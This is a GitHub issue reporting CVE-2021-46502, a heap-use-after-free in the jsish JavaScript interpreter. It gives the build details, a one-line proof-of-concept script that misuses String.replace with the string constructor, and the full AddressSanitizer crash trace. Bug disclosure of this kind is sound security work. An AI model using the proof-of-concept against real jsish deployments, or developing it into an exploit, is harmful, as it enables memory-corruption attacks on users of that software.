CVE-2021-46502: Heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d) · Issue #87 · pcmacdon/jsish

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

var x = 3; if (("ab".replace("b", "ab".constructor).replace("b", “ab".constructor)!=="aa”) || (x!==undefined)) { throw "Err-value!"; }

​

Execution steps & Output

$ ./jsish/jsish poc.js =====ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001cf3 at pc 0x7fae379c366e bp 0x7ffdcb94e5a0 sp 0x7ffdcb94dd48 READ of size 2 at 0x602000001cf3 thread T0 #0 0x7fae379c366d (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d) #1 0x55927a403f60 in Jsi_Strlen src/jsiChar.c:29 #2 0x55927a508a57 in Jsi_DSAppendLen src/jsiDString.c:99 #3 0x55927a508e7f in Jsi_DSAppend src/jsiDString.c:129 #4 0x55927a40d4b8 in StringReplaceCmd src/jsiString.c:705 #5 0x55927a3ed818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55927a6b771a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55927a6b771a in jsiEvalFunction src/jsiEval.c:837 #8 0x55927a6b771a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55927a6cb15e in jsi_evalcode src/jsiEval.c:2204 #10 0x55927a6cf274 in jsi_evalStrFile src/jsiEval.c:2665 #11 0x55927a3be66a in Jsi_Main src/jsiInterp.c:936 #12 0x55927abc303a in jsi_main src/main.c:47 #13 0x7fae36de1bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #14 0x55927a352969 in _start (/usr/local/bin/jsish+0xe8969)

0x602000001cf4 is located 0 bytes to the right of 4-byte region [0x602000001cf0,0x602000001cf4) freed by thread T0 here: #0 0x7fae37a507a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x55927a412c19 in StringConstructor src/jsiString.c:33

previously allocated by thread T0 here: #0 0x7fae37a50b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x55927a3c3a22 in Jsi_Malloc src/jsiUtils.c:52

SUMMARY: AddressSanitizer: heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d) Shadow bytes around the buggy address: 0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff8360: fa fa fd fd fa fa fd fd fa fa 07 fa fa fa fd fd 0x0c047fff8370: fa fa 00 07 fa fa 00 fa fa fa 00 00 fa fa 00 00 0x0c047fff8380: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8390: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa[fd]fa 0x0c047fff83a0: fa fa fd fa fa fa 04 fa fa fa fa fa fa fa fa fa 0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb

1 participant